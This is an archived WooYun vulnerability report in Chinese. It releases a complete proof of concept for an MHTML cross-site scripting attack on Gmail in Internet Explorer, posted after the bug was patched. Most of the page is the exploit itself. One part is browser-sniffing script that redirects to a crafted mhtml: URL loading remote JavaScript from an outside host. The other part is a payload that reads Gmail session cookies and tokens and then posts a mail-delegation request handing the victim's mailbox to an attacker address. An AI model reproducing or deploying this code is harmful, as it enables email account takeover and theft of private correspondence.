乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2011-04-29: 积极联系厂商并且等待厂商认领中,细节不对外公开 2011-04-29: 厂商已经主动忽略漏洞,细节向公众公开
还是跟mhtml有关.详细请看下面咯。
已经补掉了...现在放出给大家分享下完整的POC!
<script language="javascript"> function detectOS() { var sUserAgent = navigator.userAgent; var isWin = (navigator.platform == "Win32") || (navigator.platform == "Windows"); if (isWin) { var isWin2K = sUserAgent.indexOf("Windows NT 5.0") > -1 || sUserAgent.indexOf("Windows 2000") > -1; var isWinXP = sUserAgent.indexOf("Windows NT 5.1") > -1 || sUserAgent.indexOf("Windows XP") > -1; var isWin2003 = sUserAgent.indexOf("Windows NT 5.2") > -1 || sUserAgent.indexOf("Windows 2003") > -1; if (isWin2K || isWinXP ||isWin2003) document.location="mhtml:https://mail.google.com/support/bin/answer.py?answer=6576&cbid=-1vw2scem46j8f&src=cb&lev= index&answer=%250AContent-Location:viki%250aContent-Transfer-Encoding:base64%250D250DPHNjcmlwdCBzcmM9aHR0cDovL3d3dy5qYWNrcy5jb20vamFjay5qcz48L3NjcmlwdD4=!viki"; var isWinVista = sUserAgent.indexOf("Windows NT 6.0") > -1 || sUserAgent.indexOf("Windows Vista") > -1; var isWin7 = sUserAgent.indexOf("Windows NT 6.1") > -1 || sUserAgent.indexOf("Windows 7") > -1; if (isWin7 || isWinVista ) document.location="mhtml:https://mail.google.com/support/bin/answer.py?answer=6576&cbid=-1vw2scem46j8f&src=cb&lev= index&answer=%0AContent-Location:viki%0aContent-Transfer-Encoding:base640L0DPHNjcmlwdCBzcmM9aHR0cDovL3d3dy5qYWNrcy5jb20vamFjay5qcz48L3NjcmlwdD4=!viki"; } return "other"; } detectOS(); </script>
Content-Transfer-Encoding:后的需要base64编码.调用一个js.
<script src=http://www.jacks.com/jack.js></script>
JS代码如下:
document.write('<iframe id=ifr width=0 height=0 onload="crosscookie()" src="http://mail.google.com/mail/x/"></iframe><img src="http://www.spypig.com/67fcfa37-4240-11e0-8986-00188be7649a/pig.gif" width=0>');function crosscookie(){ var KEY = 'GMAIL_AT'; var MAIL = '[email protected]' ifr = ifr.contentWindow ? ifr.contentWindow : ifr.contentDocument; var cookies = ifr.document.cookie.split(/\s*;\s*/); var GMAIL_AT; var IK; for(var i = 0, len = cookies.length; i < len; i++){ var arr = cookies[i].split(/\s*=\s*/); if(arr[0] == KEY) { GMAIL_AT = arr[1]; } } var xhr = new ifr.ActiveXObject('Microsoft.XMLHttp'); xhr.open('GET', 'https://mail.google.com/mail/', false); xhr.send(); var source = xhr.responseText; var reg = /GLOBALS=\[/; var result = reg.exec(source); var pos = result.index + (result + '').length; var len = source.length; var l = 1; var start = pos; while(pos < len){ var c = source.charAt(pos); if(c === '[') { l++; } else if(c === ']'){ l--; } if(l === 0) break; pos++; } IK = eval('[' + source.substring(start, pos) + ']')[9]; xhr.open('POST', 'https://mail.google.com/mail/?ui=2&ik=' + IK + '&view=mdlg&at=' + GMAIL_AT, false); xhr.setRequestHeader("Content-Type", "application/x-www-form-urlencoded") xhr.send('mdrp=1&mda=' + MAIL); document.location="http://www.xxxx.com/images/scan.jpg"; //window.close();}
能做什么就不用我多说了把?
官方已经修复了,放出来,研究mail xss的人看吧!这类东西某些部门还是非常喜欢的!还是mhtml问题哈~
未能联系到厂商或者厂商积极拒绝
漏洞Rank:10 (WooYun评价)